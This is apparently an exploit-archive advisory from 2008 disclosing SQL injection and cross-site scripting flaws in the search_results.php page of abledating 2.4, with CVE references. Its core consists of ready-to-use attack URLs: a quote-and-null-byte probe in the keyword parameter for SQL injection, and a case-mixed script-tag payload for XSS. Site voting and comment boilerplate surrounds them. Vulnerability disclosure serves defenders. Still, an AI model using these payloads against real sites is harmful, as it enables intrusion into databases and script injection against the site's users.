abledating 2.4 Sql injection and cross site scripting on search_results.php

2008-05-25 / 2008-05-27

Credit: a.jasbi

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2008-6439 | CVE-2008-6572

CWE: CWE-79

By : Ali Jasbi ( hackerz.ir security & hacking team)
vendor : abk-soft.com
product name : abledating 2.4
Exploits :
1- Sql injection :
bug :
http://abledating//search_results.php?p_age_from=18&p_age_to=18&keyword=[sql injection]&status=online&save_search=on&search_name=My%20search&photo=on&p_orientation%255B%255D=2&order=rating&sort=desc&p_relation%255B%255D=4&search
test :
http://abledating/search_results.php?p_age_from=18&p_age_to=18&keyword=%00'&status=online&save_search=on&search_name=My%20search&photo=on&p_orientation%255B%255D=2&order=rating&sort=desc&p_relation%255B%255D=4&search
2-Cross site scripting :
bug :
http://abledating/search_results.php?p_orientation%5B%5D=2&p_age_from=18&p_age_to=18&p_relation%5B%5D=on&keyword=>'><ScRiPt%20%0a%0d>alert(42119.7535489005)%3B</ScRiPt>&status=online&save_search=on&search_name=My%20search&photo=on

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

abledating 2.4 Sql injection and cross site scripting on search_results.php

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.